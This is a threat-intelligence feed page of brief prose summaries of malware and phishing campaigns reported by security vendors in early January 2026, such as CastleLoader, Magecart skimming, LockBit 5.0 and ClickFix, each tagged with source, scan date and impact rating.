CastleLoader_Stealthy_Loader_Targeting_Governments
HIGH
+
—
- Intel Source:
- Any.Run
- Intel Name:
- CastleLoader_Stealthy_Loader_Targeting_Governments
- Date of Scan:
- 2026-01-16
- Impact:
- HIGH
- Summary:
- Researchers at ANY.RUN have identified a new variant of CastleLoader, a sophisticated multi-stage loader actively targeting government organizations and related infrastructure sectors. The malware functions as an initial access broker, delivering secondary payloads such as information stealers and remote access trojans while evading detection through complex execution chains. CastleLoader leverages an Inno Setup installer combined with AutoIt scripts to stage and deploy encrypted payloads, masking malicious activity behind legitimate installer behavior. Once executed, it uses process injection and API-level manipulation to execute in memory, bypassing static detection and endpoint monitoring tools. The analysis revealed deliberate use of API hashing, dynamic function resolution, and kernel-level process manipulation to conceal operations. Telemetry indicates CastleLoader’s capability to deliver multiple payloads while maintaining persistence, credential theft, and network reconnaissance functionality. Its modular design allows it to adapt across environments, suggesting ongoing development and use by organized threat actors.
New_Magecart_Campaign
MEDIUM
+
—
- Intel Source:
- Slient Push
- Intel Name:
- New_Magecart_Campaign
- Date of Scan:
- 2026-01-16
- Impact:
- MEDIUM
- Summary:
- Silent Push researchers have identified a previously untracked Magecart-style web-skimming operation active since at least early 2022. The campaign compromises e-commerce websites and injects malicious JavaScript designed to capture payment card details and other personal data entered at checkout. The group shows moderate to advanced capability through heavy JavaScript obfuscation, dynamic execution paths, DOM monitoring, and self-removal routines intended to minimize discovery. The campaign mainly affects online shoppers and the businesses that unknowingly host the malicious code, creating losses from card fraud, identity theft, and reputational damage. The operation relies on rotating third-party domains to extend longevity and avoid takedown efforts.
DeadLock_Ransomware
MEDIUM
+
—
- Intel Source:
- Group IB
- Intel Name:
- DeadLock_Ransomware
- Date of Scan:
- 2026-01-16
- Impact:
- MEDIUM
- Summary:
- Researchers from Group-IB have identified a new ransomware family known as DeadLock, which first emerged in July 2025 and has steadily expanded its tooling and infrastructure since its emergence. DeadLock distinguishes itself by abusing Polygon blockchain smart contracts to store and rotate proxy addresses supporting both the malware and its web-based ransom note infrastructure. Once executed, the ransomware encrypts files, alters extensions, replaces desktop wallpapers, and delivers ransom notes that increasingly assert data theft. The threat actors also rely on AnyDesk for remote access and execute PowerShell commands to terminate services, delete shadow copies, and remove evidence of the malware. DeadLock primarily targets organizations rather than individuals, aiming to cause widespread operational disruption, increase the risk of sensitive data exposure, and hinder recovery efforts by destroying backups.
RedVDS_Virtual_Desktop_Infrastructure_Abuse
HIGH
+
—
- Intel Source:
- Microsoft
- Intel Name:
- RedVDS_Virtual_Desktop_Infrastructure_Abuse
- Date of Scan:
- 2026-01-16
- Impact:
- HIGH
- Summary:
- Researchers at Microsoft have identified RedVDS as a maliciously aligned virtual desktop hosting platform widely exploited by multiple threat actors for phishing, business email compromise attacks, and financial fraud. The service offers low-cost Windows-based remote servers that provide full administrative control and generate minimal logging, enabling attackers to operate with limited visibility. RedVDS supports rapid provisioning of cloned servers, accepts anonymous cryptocurrency payments, and permits unrestricted use for mass mailing, credential theft, and identity impersonation. There are multiple groups abusing the platform, including Storm-0259 and Storm-2470, rather than a lone operator. Impacted sectors include legal, construction, manufacturing, real estate, healthcare, and education. The RedVDS-enabled activity has contributed to more than $40 million in reported fraud losses in the United States since March 2025.
VoidLink_Advanced_Cloud_Native_Linux_Malware
HIGH
+
—
- Intel Source:
- Checkpoint
- Intel Name:
- VoidLink_Advanced_Cloud_Native_Linux_Malware
- Date of Scan:
- 2026-01-15
- Impact:
- HIGH
- Summary:
- Researchers at Check Point Research have identified a sophisticated Linux malware framework named VoidLink, engineered to achieve persistent, stealthy control across cloud and containerized environments. Developed in Zig, VoidLink leverages a highly modular architecture built around a custom plugin API, enabling dynamic deployment of more than thirty modules and numerous specialized plugins for reconnaissance, persistence, and privilege escalation. The framework demonstrates adaptive operational security (OPSEC) behavior, dynamically adjusting its evasion strategies based on the detected security posture, container type, or cloud provider—covering AWS, Azure, and GCP, among others.
ShellBot_Linux_SSH_DDoS_Botnet_Surge
HIGH
+
—
- Intel Source:
- ASEC
- Intel Name:
- ShellBot_Linux_SSH_DDoS_Botnet_Surge
- Date of Scan:
- 2026-01-15
- Impact:
- HIGH
- Summary:
- Researchers at AhnLab Security Intelligence Center (ASEC) have identified an ongoing campaign targeting Linux SSH servers in the fourth quarter of 2025, driven primarily by the long-active threat group RUBYCARP using the ShellBot (PerlBot) malware family. The attacks rely on brute-force and dictionary-based intrusion attempts against poorly secured SSH services, leading to large-scale deployments of DDoS-capable bots. Once compromised, the systems are enrolled into an IRC-controlled botnet capable of executing multiple commands, including flooding, port scanning, file downloads, and remote command execution.
Andariel_TigerRAT_Web_Server_Intrusions
HIGH
+
—
- Intel Source:
- ASEC
- Intel Name:
- Andariel_TigerRAT_Web_Server_Intrusions
- Date of Scan:
- 2026-01-14
- Impact:
- HIGH
- Summary:
- Researchers at AhnLab Security Intelligence Center (ASEC) have identified ongoing intrusion activity attributed to the Andariel threat group, targeting Windows-based web servers during the fourth quarter of 2025. The attacks involved the deployment of the TigerRAT backdoor through compromised IIS environments, where threat actors likely used web shells to gain initial access. Once inside, Andariel operators executed reconnaissance and system commands to enumerate host information and then leveraged PowerShell to retrieve additional payloads from external servers. TigerRAT enabled remote command execution, credential theft, screen capture, and tunneling capabilities, facilitating long-term control over compromised systems. The adversaries employed privilege escalation tools such as PrintSpoofer and Potato variants to gain elevated access and utilized ProcDump to extract sensitive credentials.
Trigona_Targeting_Windows_SQL_Servers
HIGH
+
—
- Intel Source:
- ASEC
- Intel Name:
- Trigona_Targeting_Windows_SQL_Servers
- Date of Scan:
- 2026-01-14
- Impact:
- HIGH
- Summary:
- Researchers at AhnLab Security Intelligence Center (ASEC) have identified a resurgence of the Trigona threat actor targeting Windows-based database servers, particularly MS-SQL and MySQL, during the fourth quarter of 2025. The attackers leveraged legitimate administrative tools and system components to execute and conceal their operations, notably abusing the CLR Shell for command execution and privilege escalation. They also employed Bulk Copy Program (bcp.exe) to move malware between databases and local file systems, enabling infection directly through SQL environments. Trigona actors were observed deploying multiple payloads using Bitsadmin, Curl, and PowerShell to download additional malware, while maintaining persistence through remote access utilities such as AnyDesk and RustDesk.
Konni_PowerShell_Espionage_via_LNK_Decoy
MEDIUM
+
—
- Intel Source:
- Dreaming Bluebird
- Intel Name:
- Konni_PowerShell_Espionage_via_LNK_Decoy
- Date of Scan:
- 2026-01-13
- Impact:
- MEDIUM
- Summary:
- Researchers at Dreaming Bluebird have identified a new PowerShell-based malware attributed to the North Korean threat group Konni, disguised as a national security document. The campaign employs a malicious shortcut file titled National Security Report 2.lnk, which masquerades as a legitimate policy report related to the 9th Congress of the Workers' Party of Korea. When executed, the shortcut triggers a hidden PowerShell script configured with execution policy bypass and invisible window settings to evade user awareness. The script reconstructs and launches multiple embedded payloads, including a decoy document, executable, and supporting database files, suggesting a staged infection chain.
Medusa_Ransomware_RMM_Abuse_Campaigns
HIGH
+
—
- Intel Source:
- darktrace
- Intel Name:
- Medusa_Ransomware_RMM_Abuse_Campaigns
- Date of Scan:
- 2026-01-13
- Impact:
- HIGH
- Summary:
- Researchers from Darktrace have uncovered a large-scale ransomware campaign conducted by the Medusa ransomware-as-a-service operation. Active since at least 2022 and expanding rapidly through 2024 and 2025, Medusa has emerged as one of the most active ransomware groups globally, with more than 500 confirmed victim organizations. The group’s primary objective is financial extortion through a combination of data theft, encryption, and operational disruption. Medusa actors typically obtain initial access through initial access brokers or by exploiting unpatched, internet-facing systems, including file transfer and remote management software. Following access, the attackers heavily abuse legitimate remote monitoring and management tools instead of relying solely on custom malware. These tools enable stealthy persistence, lateral movement, command-and-control, and large-scale data exfiltration while blending into normal administrative behavior. Prior to deploying ransomware, the group stages and exfiltrates sensitive data to attacker-controlled infrastructure. Ransomware execution is then performed directly on victim systems, encrypting files and delivering ransom notes. The combination of trusted tooling abuse, broad sector targeting, and triple-extortion tactics makes Medusa a high-impact and difficult-to-detect ransomware threat.
BlueDelta_Evolving_redential_harvesting_campaigns
MEDIUM
+
—
- Intel Source:
- Insikt Group
- Intel Name:
- BlueDelta_Evolving_redential_harvesting_campaigns
- Date of Scan:
- 2026-01-13
- Impact:
- MEDIUM
- Summary:
- Recorded Future Insikt Group reports multiple credential-harvesting campaigns conducted between February and September 2025 by BlueDelta, a Russian state-sponsored threat group associated with the GRU . The activity expands BlueDelta's established credential-theft operations and shows refinement in lure themes, redirection chains, and credential capture logic . The actor's intent is to steal authentication material for espionage access to communications and remote-access services relevant to Russian intelligence priorities . BlueDelta impersonated common enterprise and consumer authentication portals including Microsoft Outlook Web Access, Google, and Sophos VPN login experiences . Campaigns used multi-stage infrastructure, including link shorteners, free hosting, and tunneling services, to host phishing content and relay harvested data while limiting attribution . Several lures embedded legitimate PDF documents (for example, think-tank and climate publications) to increase credibility and bypass controls . JavaScript-based collection logic captured victim identifiers, page-open events, and submitted credentials, then redirected victims to legitimate destinations to reduce suspicion . Targeting observed in this reporting includes individuals linked to Turkish energy and nuclear research, a European think tank, and organizations in North Macedonia and Uzbekistan, aligning with government and policy-relevant collection interests . The operational "so what" is that these campaigns can convert a single user interaction into account compromise pathways against webmail and VPN access points, enabling follow-on intrusion, monitoring, and intelligence collection
MuddyWater_RustyWater_Rust_Based_Espionage
HIGH
+
—
- Intel Source:
- Cloudsek
- Intel Name:
- MuddyWater_RustyWater_Rust_Based_Espionage
- Date of Scan:
- 2026-01-12
- Impact:
- HIGH
- Summary:
- Researchers from CloudSEK have uncovered a spear-phishing driven cyber-espionage campaign attributed to the Iran-aligned Muddy Water threat group. Active through late 2025 and early 2026, the operation primarily targets diplomatic, maritime, financial, telecom, and education entities across the Middle East with the objective of long-term intelligence collection and sustained covert access. The attackers rely on socially engineered phishing emails carrying malicious Microsoft Word documents that abuse VBA macros for initial access. Once a victim enables content, the macros reconstruct and deploy a Rust-based implant known as RustyWater, marking a significant evolution from the group’s historical PowerShell and VBS tooling. After execution, the implant establishes persistence through Windows registry run keys and performs extensive host reconnaissance, including user, system, and domain profiling. RustyWater communicates with its command-and-control infrastructure over HTTP using encrypted, jittered beacons to evade detection. The malware supports modular, post-compromise capability expansion, allowing operators to tailor surveillance and collection activities based on the victim’s role and environment
Redtail_Malware_SSH_Upload_Activity
MEDIUM
+
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Redtail_Malware_SSH_Upload_Activity
- Date of Scan:
- 2026-01-10
- Impact:
- MEDIUM
- Summary:
- Researchers at the SANS Internet Storm Center identified clusters of malicious activity involving Redtail malware through analysis of DShield honeypot sensor data. Using ELK and Gephi visualization, the study examined relationships between source IPs, filenames, and file hashes captured by Cowrie SSH honeypots over a 30-day period. The analysis revealed two distinct malware distribution groups, one attributed to Redtail, which demonstrated repeated file uploads and coordinated behavior across multiple sources. This activity highlights Redtail’s continued presence in automated scanning and exploitation campaigns targeting exposed SSH services. The research demonstrates the value of DShield sensor telemetry and graph-based analytics in uncovering distributed malware operations.
MassLogger_Email_Borne_Credential_Theft
MEDIUM
+
—
- Intel Source:
- Malware-Traffic-Analysis
- Intel Name:
- MassLogger_Email_Borne_Credential_Theft
- Date of Scan:
- 2026-01-10
- Impact:
- MEDIUM
- Summary:
- Researchers at Malware-Traffic-Analysis.net identified a MassLogger infection campaign leveraging phishing emails with malicious compressed attachments to deliver credential-stealing malware. The infection chain began with a socially engineered message containing an archive file disguised as a quotation request, which, when extracted and executed, launched a Windows PE executable. This executable initiated the MassLogger malware, a .NET-based information stealer designed to harvest stored credentials and system details from the victim host. Following execution, the malware exfiltrated collected data through encrypted outbound email communication using standard network ports, blending its traffic with legitimate services. The infection exhibited typical keylogging and credential theft behavior but did not display lateral movement, persistence mechanisms, or destructive intent during sandbox testing.
GuLoader_HR_Phishing_Delivers_Remcos_RAT
HIGH
+
—
- Intel Source:
- ASEC
- Intel Name:
- GuLoader_HR_Phishing_Delivers_Remcos_RAT
- Date of Scan:
- 2026-01-10
- Impact:
- HIGH
- Summary:
- Researchers at AhnLab Security Intelligence Center (ASEC) have identified a phishing campaign distributing GuLoader malware disguised as human resources performance reports. The attack begins with emails crafted to appear as legitimate internal communications regarding employee performance evaluations. The attached RAR archive contains a malicious NSIS executable camouflaged as a PDF file, which executes GuLoader when opened. Upon execution, the loader retrieves shellcode from a remote command server, which subsequently deploys the Remcos remote access trojan. This secondary payload provides threat actors with extensive control over infected systems, enabling activities such as keylogging, credential theft, data exfiltration, and surveillance through webcams and microphones.
LockBit_5_Advanced_RaaS_Encryption_Operations
HIGH
+
—
- Intel Source:
- ASEC
- Intel Name:
- LockBit_5_Advanced_RaaS_Encryption_Operations
- Date of Scan:
- 2026-01-10
- Impact:
- HIGH
- Summary:
- Researchers at AhnLab ASEC have identified LockBit 5.0 as the latest evolution of the long-running Ransomware-as-a-Service (RaaS) operation that remains one of the most active global cybercrime threats. LockBit 5.0 demonstrates a high degree of automation and sophistication, utilizing multi-stage intrusion methods including exploitation of vulnerabilities, brute-force credential attacks, and lateral movement before deploying ransomware payloads. The variant employs modern cryptographic mechanisms such as ChaCha20-Poly1305 for file encryption and X25519 with BLAKE2b for key exchange, producing unique encryption keys and extensions per victim to evade traditional detection. It disables system recovery mechanisms by terminating volume shadow services and backup-related processes, while excluding critical system directories to preserve system stability during encryption.
Remcos_RAT_Phishing_Campaigns_via_Fake_Documents
HIGH
+
—
- Intel Source:
- ASEC
- Intel Name:
- Remcos_RAT_Phishing_Campaigns_via_Fake_Documents
- Date of Scan:
- 2026-01-10
- Impact:
- HIGH
- Summary:
- Researchers at ASEC have identified a widespread phishing campaign in December 2025 that primarily leveraged document and compressed file attachments to deliver the Remcos remote access trojan (RAT). The majority of observed email threats during this period—approximately 91 percent—were classified as phishing, with attackers using HTML-based fake login and payment pages to capture victim credentials. These phishing messages often impersonated trusted entities such as financial institutions or tax agencies and included Korean-language lures with convincing subject lines and attachment names. Once opened, the attached files either redirected users to malicious websites or executed embedded payloads that downloaded Remcos RAT from attacker-controlled servers. The malware then granted the threat actors persistent remote access, enabling credential theft, surveillance, and further system compromise.
Escape_of_ESXi_VM
HIGH
+
—
- Intel Source:
- Huntress
- Intel Name:
- Escape_of_ESXi_VM
- Date of Scan:
- 2026-01-09
- Impact:
- HIGH
- Summary:
- Researchers at Huntress have identified a highly advanced attack targeting VMware ESXi servers that enables threat actors to break out of virtual machines and take full control of the hypervisor. The attackers initially gained access using stolen VPN credentials and then moved laterally with domain administrator privileges until reaching the ESXi environment. Once there, they deployed custom tooling that disabled core security protections, load an unsigned driver through a BYOVD technique, and execute a VM escape. This gave them kernel-level control of the host and access to all virtual machines running on it. The attackers also installed a stealthy VSock backdoor that hides from normal network monitoring and appears designed for later ransomware activity.
UAT7290_Targets_Telecommunications_Infrastructure
HIGH
+
—
- Intel Source:
- Cisco Talos
- Intel Name:
- UAT7290_Targets_Telecommunications_Infrastructure
- Date of Scan:
- 2026-01-09
- Impact:
- HIGH
- Summary:
- Researchers from Cisco have uncovered a long-running cyber-espionage campaign linked to the China-based threat group UAT-7290. Active since at least 2022, the group has focused on telecommunications providers and other critical infrastructure with the objective of collecting intelligence and maintaining long-term, covert access to target networks. The attackers rely on two main techniques: exploiting unpatched vulnerabilities and brute-forcing exposed internet-facing devices. After gaining access, they deploy custom malware tailored for both Linux networking equipment and Windows environments, enabling persistent remote control, file manipulation, and lateral movement. The group conducts extensive reconnaissance to understand victim environments prior to exploitation, and its tools and behaviors closely overlap with those of other well-established China-linked threat actors.
Malicious_NPM_Packages_Deliver_NodeCordRAT
MEDIUM
+
—
- Intel Source:
- Zscaler
- Intel Name:
- Malicious_NPM_Packages_Deliver_NodeCordRAT
- Date of Scan:
- 2026-01-09
- Impact:
- MEDIUM
- Summary:
- Researchers at Zscaler uncovered a campaign involving malicious npm packages masquerading as legitimate Bitcoin-related libraries, which secretly install a remote access tool known as NodeCordRAT. The attackers primarily target developers and others who install these packages directly or through dependent libraries. Once executed, the malware performs host fingerprints, runs arbitrary shell commands, captures screenshots, and exfiltrates files and sensitive data. Communication with the threat actor is carried out via private Discord channels that function as command-and-control infrastructure. Initial access is enabled through typosquatted npm packages that deploy malicious dependencies during post-install scripts. The impact includes the theft of Chrome credentials, sensitive documents, and MetaMask wallet data, creating significant financial and privacy risks.
Fake_WinRAR_Installer_Malware_Delivery
MEDIUM
+
—
- Intel Source:
- Malware Bytes
- Intel Name:
- Fake_WinRAR_Installer_Malware_Delivery
- Date of Scan:
- 2026-01-09
- Impact:
- MEDIUM
- Summary:
- Malwarebytes researchers have identified a campaign distributing fake WinRAR installers across multiple Chinese-language websites. The operation uses trojanized installers that deliver malware while presenting users with a legitimate installation workflow. The objective is to lure individuals seeking popular file-compression software into unknowingly executing a malicious payload. The delivery chain relies on self-extracting archives that execute multiple embedded executables in sequence. One component installs the genuine WinRAR application to maintain user trust and mask malicious activity. A second payload deploys malware tied to the Winizipper family. Once executed, the malware establishes a covert backdoor that provides attackers with remote access, enabling data theft, system control, and the potential deployment of additional payload.
KongTuke_ClickFix_Loader_Campaign
MEDIUM
+
—
- Intel Source:
- Malware-Traffic-Analysis
- Intel Name:
- KongTuke_ClickFix_Loader_Campaign
- Date of Scan:
- 2026-01-09
- Impact:
- MEDIUM
- Summary:
- Researchers at Malware-Traffic-Analysis.net have identified a new malware campaign involving the KongTuke loader, which uses a deceptive ClickFix CAPTCHA page to deliver malicious payloads to Windows systems. The activity begins when users encounter a fake verification prompt that executes a hidden PowerShell command, leading to the download and installation of a malicious archive. Once executed, the malware installs components into user-level directories and creates scheduled tasks that ensure continuous operation by relaunching its processes every few minutes. Subsequent payloads retrieved from remote servers install additional modules, expand persistence mechanisms, and execute obfuscated scripts to avoid detection. KongTuke’s behavior reflects a multi-stage loader framework designed for maintaining footholds and preparing compromised systems for secondary payloads, such as information stealers or remote access tools.
CrazyHunter_ransomware_Target_Taiwan_Healthcare
HIGH
+
—
- Intel Source:
- Trellix
- Intel Name:
- CrazyHunter_ransomware_Target_Taiwan_Healthcare
- Date of Scan:
- 2026-01-08
- Impact:
- HIGH
- Summary:
- Researchers from Trellix uncovered a rapidly expanding ransomware campaign operated by the group known as CrazyHunter. The campaign centres on attacks against healthcare providers in Taiwan. Once inside a network, the attackers move quietly and deliberately, exploiting weak passwords in Active Directory, abusing Group Policy for wide distribution and escalating privileges to gain the control. The ransomware disables endpoint security using a bring-your-own-vulnerable-driver technique. Once deployed, it encrypts data using a hybrid ChaCha20 and ECIES scheme that complicates recovery without the attacker’s private key. The malware avoids encrypting critical system directories to maintain stability, then displays a ransom note and custom wallpaper to pressure victims into paying. The group operates with clear professionalism, exfiltrating sensitive data, publishing stolen files on leak sites, and conducting negotiations via email, Telegram, and TOR channels.
Lovable_Malicious_Chrome_Chat_Extensions
HIGH
+
—
- Intel Source:
- OX Security
- Intel Name:
- Lovable_Malicious_Chrome_Chat_Extensions
- Date of Scan:
- 2026-01-07
- Impact:
- HIGH
- Summary:
- Researchers at OX Security have identified a large-scale malware campaign involving two malicious Chrome extensions impersonating the legitimate AITOPIA AI Sidebar tool. The fraudulent extensions, distributed via the official Chrome Web Store, secretly exfiltrated data from users’ ChatGPT and DeepSeek conversations alongside their general browsing activity. The campaign affected over 900,000 users worldwide, including those in corporate environments where sensitive business and research data may have been exposed. The extensions operated under the guise of offering enhanced AI chat functionality but instead captured prompts, responses, and browsing metadata, transmitting them to attacker-controlled servers at regular intervals. The threat actors, tracked as Lovable, used deceptive branding, false privacy policies, and infrastructure anonymization to evade attribution.
Spoofed_Domain_Phishing_via_Complex_Routing
HIGH
+
—
- Intel Source:
- Microsoft
- Intel Name:
- Spoofed_Domain_Phishing_via_Complex_Routing
- Date of Scan:
- 2026-01-07
- Impact:
- HIGH
- Summary:
- Researchers at Microsoft have identified phishing campaigns in which attackers abuse email configurations and routing rather than exploiting software vulnerability. In these operations, threat actors take advantage of complex email routing setups and poorly enforced spoofing protections to deliver phishing emails that appear to originate from within the victim organization. The primary objectives are credential theft and financial fraud, including business email compromise and fraudulent invoice payments. To scale these campaigns and bypass multi-factor authentication, attackers leverage phishing-as-a-service platform such as Tycoon2FA that employ on adversary-in-the-middle techniques. Organizations with misconfigured or permissive SPF, DKIM, or DMARC policies, enabled Direct Send usage, or third-party mail connectors are particularly vulnerable. The impact includes credential compromise, mailbox takeover, unauthorized financial transactions and potential data loss.
AI_Enabled_Gobruetforcer_Malware
HIGH
+
—
- Intel Source:
- CheckPoint
- Intel Name:
- AI_Enabled_Gobruetforcer_Malware
- Date of Scan:
- 2026-01-07
- Impact:
- HIGH
- Summary:
- Researchers from Checkpoint have uncovered a campaign using Gobruetforcer, a modular malware and botnet framework designed to target internet-exposed Linux servers. The threat group relies on large-scale brute-force attempts and weak or default passwords to access services such as FTP, MySQL, PostgreSQL, and phpMyAdmin, even using AI-generated username/password patterns to increase success. After gaining access, the malware deploys cryptominers to steal computing resources and can also connect the system to an IRC-based botnet for remote control. The toolset adapts to different system environments, hides its processes, and ensures it can stay on a compromised machine for as long as possible. Rather than using stealthy exploits, the operation prioritizes massive scanning and automated logins to compromise as many systems as it can. The campaign primarily affects misconfigured Linux servers and results in wasted computing resources, increased security risk, and potential follow-on attacks.
Kimsuky_VBScript_Downloader
MEDIUM
+
—
- Intel Source:
- Dreaming Bluebird
- Intel Name:
- Kimsuky_VBScript_Downloader
- Date of Scan:
- 2026-01-06
- Impact:
- MEDIUM
- Summary:
- Researchers at Dreaming Bluebird have identified a VBScript-based downloader attributed to the North Korean threat group Kimsuky, known for espionage and data theft operations under the Reconnaissance General Bureau. The malware, named 1.vba, employs a Caesar cipher for string obfuscation and reconstructs its code at runtime using the VBScript Execute function to evade static antivirus detection. Once deobfuscated, it creates several common COM objects—such as WScript.Shell, FileSystemObject, and XMLHTTP—to perform file downloads and execute payloads from remote sources. This technique enables the actor to leverage trusted infrastructure and script-native capabilities to deliver secondary stages without triggering conventional defenses.
Sliver_C2_Hosted_on_Compromised_FortiWeb_Firewalls
MEDIUM
+
—
- Intel Source:
- Ctrlaltintel
- Intel Name:
- Sliver_C2_Hosted_on_Compromised_FortiWeb_Firewalls
- Date of Scan:
- 2026-01-06
- Impact:
- MEDIUM
- Summary:
- Researchers have uncovered a threat actor abusing compromised FortiWeb WAF to operate the Sliver post-exploitation framework for long-term covert access. The actor exploited public-facing FortiWeb vulnerabilities, including React2Shell (CVE-2025-55182), to deploy implants and prioritized persistence and traffic proxying over immediate financial gain The actor also deployed Fast Reverse Proxy (FRP) and a modified microsocks binary to expose internal services and provide SOCKS-based proxy access through trusted edge devices. Affected organizations include government and financial sectors, with activity notably concentrated in Bangladesh and Pakistan. The impact includes loss of perimeter trust, covert traffic relaying, and elevated risk of downstream compromise. The use of decoy websites impersonating Ubuntu Packages and the Bangladesh Airforce indicates a blend of regional targeting and opportunistic exploitation.
PHALT_BLYX_Fake_BSOD_Malware_Chain
HIGH
+
—
- Intel Source:
- Securonix Threat Research
- Intel Name:
- PHALT_BLYX_Fake_BSOD_Malware_Chain
- Date of Scan:
- 2026-01-06
- Impact:
- HIGH
- Summary:
- Researchers at Securonix Threat Labs have identified an advanced multi-stage campaign, tracked as PHALT#BLYX, that combines deceptive social engineering with trusted tool abuse to deliver a remote access trojan. The operation targets the hospitality sector using phishing emails that impersonate Booking.com reservation alerts to lure victims to fraudulent websites. These pages display fake CAPTCHA errors and a counterfeit Blue Screen of Death designed to coerce users into performing a “ClickFix” action, which secretly executes malicious PowerShell commands. The script downloads and runs a tampered MSBuild project, leveraging the legitimate Microsoft utility to compile and execute embedded malware code while bypassing standard defenses. The campaign demonstrates technical maturity through layered defense evasion, including Windows Defender exclusions, process hollowing, and the use of encrypted communications. The final payload, a variant of DCRat, grants attackers full system control, persistence, and the ability to deploy secondary malware. Linguistic artifacts and infrastructure suggest a Russian-speaking threat actor with operational discipline and familiarity with living-off-the-land techniques. This campaign underscores the increasing convergence of psychological manipulation and legitimate tool abuse in modern malware delivery.
DarkSpectre_Large_Scale_Browser_Extension_Espionage
HIGH
+
—
- Intel Source:
- Koi Security
- Intel Name:
- DarkSpectre_Large_Scale_Browser_Extension_Espionage
- Date of Scan:
- 2026-01-05
- Impact:
- HIGH
- Summary:
- Researchers at Koi Security have identified DarkSpectre, a coordinated Chinese cyber campaign responsible for compromising over 8.8 million browsers across Chrome, Edge, Firefox, and Opera through malicious extensions. The threat actor operated three interconnected campaigns—ShadyPanda, GhostPoster, and The Zoom Stealer—that began as legitimate browser tools before being weaponized for espionage, surveillance, and financial fraud. DarkSpectre maintained benign-seeming extensions for several years, achieving “verified” marketplace status before activating hidden payloads. These payloads enabled remote code injection, data exfiltration, credential theft, and real-time monitoring of corporate meetings and communications.
APT36_Fileless_Espionage_Targeting_India
HIGH
+
—
- Intel Source:
- CYFIRMA
- Intel Name:
- APT36_Fileless_Espionage_Targeting_India
- Date of Scan:
- 2026-01-05
- Impact:
- HIGH
- Summary:
- Researchers at CYFIRMA have observed that APT36, also known as Transparent Tribe, a Pakistan-aligned espionage group, carried out a multi-stage phishing operation targeting Indian government and strategic entities. The campaign relied on a weaponized Windows shortcut file masquerading as a legitimate PDF inside a ZIP archive, enabling fileless delivery of a Remote Access Trojan. Execution was triggered via native Windows utilities to retrieve and run a malicious script, which decrypted multiple payloads directly in memory to avoid disk artifacts. The attack chain included two core components: one that weakened .NET security controls and another that loaded a malicious DLL responsible for full RAT functionality, including encrypted command-and-control communication, data exfiltration, screenshot capture, and remote system control. Persistence was designed to be antivirus-aware, dynamically adjusting techniques based on the security products detected, and leveraged registry changes, startup shortcuts, and script-based mechanisms. Overall, the activity reflects a focus on stealthy, long-term intelligence collection, highlighting APT36’s shift toward modular, memory-resident implants, extensive living-off-the-land abuse, and resilient persistence aimed at sustained espionage against Indian government environments.
ClickFix_Clipboard_Based_Infection_Chain
HIGH
+
—
- Intel Source:
- Hudson Rock Threat Intelligence
- Intel Name:
- ClickFix_Clipboard_Based_Infection_Chain
- Date of Scan:
- 2026-01-05
- Impact:
- HIGH
- Summary:
- Researchers at Hudson Rock have identified a rapidly evolving malware delivery technique known as ClickFix, which transforms ordinary users into unwitting distributors of infostealer malware. This campaign leverages social engineering rather than exploit kits—tricking victims into executing clipboard-injected PowerShell commands under the guise of security checks or update prompts. Once executed, these scripts retrieve and run info-stealing payloads directly in memory, enabling credential theft and further compromise without relying on traditional file-based execution.
Rogue_ScreenConnect_Delivered_RMM_Abuse
MEDIUM
+
—
- Intel Source:
- Huntress
- Intel Name:
- Rogue_ScreenConnect_Delivered_RMM_Abuse
- Date of Scan:
- 2026-01-05
- Impact:
- MEDIUM
- Summary:
- Researchers from Huntress have uncovered a wave of incidents in which attackers use social engineering to install a rogue version of the ScreenConnect remote management tool on victim systems. The attackers impersonate routine business activities such as sending invitations, invoices, or account statements to trick users into running malicious installers. Once installed, the fake ScreenConnect setup gives the attacker persistent remote access to the endpoint. This activity does not exploit a software vulnerability in ScreenConnect itself but instead abuses the trust users place in a legitimate and widely used RMM tool. Campaigns observed throughout 2025 show repeated reuse of lure themes, file names, domains, and hashes, suggesting moderate operational maturity rather than highly customized attacks. Victims span multiple organizations, with infrastructure reused over time. The primary goal appears to be gaining unauthorized remote access, which can enable follow-on actions such as credential theft, lateral movement, and deeper compromise.
Lumma_Stealer_Multi_Stage_Windows_Infection
MEDIUM
+
—
- Intel Source:
- Malware-Traffic-Analysis
- Intel Name:
- Lumma_Stealer_Multi_Stage_Windows_Infection
- Date of Scan:
- 2026-01-05
- Impact:
- MEDIUM
- Summary:
- Researchers at Malware-Traffic-Analysis have documented a January 2026 incident involving a Lumma Stealer infection that progressed into additional malware deployment. The activity began with a Windows installer masquerading as a legitimate application, which unpacked several temporary components, including an AutoIt executable and supporting files used to assemble an AutoIt-compiled Lumma Stealer payload. The resulting script executed credential theft and related data harvesting functions, consistent with known Lumma Stealer behavior. Network analysis showed outbound command-and-control communication followed by the retrieval of further malicious content, indicating secondary payload delivery or loader execution after the initial theft phase. Overall, the sequence reflects a multi-stage information-stealer campaign that abuses legitimate scripting frameworks for evasion, automated execution, and follow-on compromise, posing a data loss risk to Windows environments, particularly within enterprise networks.
Kimsuky_USCG_Report_themed_Malware
HIGH
+
—
- Intel Source:
- Dreaming Bluebird
- Intel Name:
- Kimsuky_USCG_Report_themed_Malware
- Date of Scan:
- 2026-01-05
- Impact:
- HIGH
- Summary:
- Researchers at Dreaming Bluebird have identified a new malware campaign attributed to the North Korean threat group Kimsuky, which leverages a fake U.S. Coast Guard inspection report as a lure to target maritime and logistics organizations. The malicious file, disguised as a legitimate PDF, uses multi-stage JavaScript execution with layered Base64 encoding and obfuscation to silently deliver a secondary payload on Windows systems. The script employs ActiveX, ADODB.Stream, and Windows Script Host to write and execute payloads from the ProgramData directory, ultimately invoking PowerShell and DLL execution to establish persistence and command capability. Error handling through silent try/catch loops and the use of legitimate utilities such as certutil and regsvr32 enable stealthy operation and reduce detection likelihood.
VVS_Stealer_Obfuscated_Python_Credential_Theft
MEDIUM
+
—
- Intel Source:
- Unit42
- Intel Name:
- VVS_Stealer_Obfuscated_Python_Credential_Theft
- Date of Scan:
- 2026-01-05
- Impact:
- MEDIUM
- Summary:
- Researchers at Palo Alto Networks Unit 42 have identified a new Python-based information stealer named VVS Stealer, designed to target Discord users and exfiltrate credentials, tokens, and browser data. The malware employs the Pyarmor tool for code obfuscation, leveraging advanced encryption and Byte-Code-to-Compilation (BCC) features to hinder analysis and detection. VVS Stealer has been in active development since early 2025 and is advertised on Telegram as a hacking utility for stealing Discord and browser information. The stealer achieves persistence by copying itself to the Windows Startup directory and uses fake error messages to disguise its operation. Once active, it harvests sensitive data including browser cookies, history, passwords, and Discord tokens before exfiltrating the information via webhooks to attacker-controlled endpoints.
A_Deployment_of_CountLoader_and_ACR_Stealer
MEDIUM
+
—
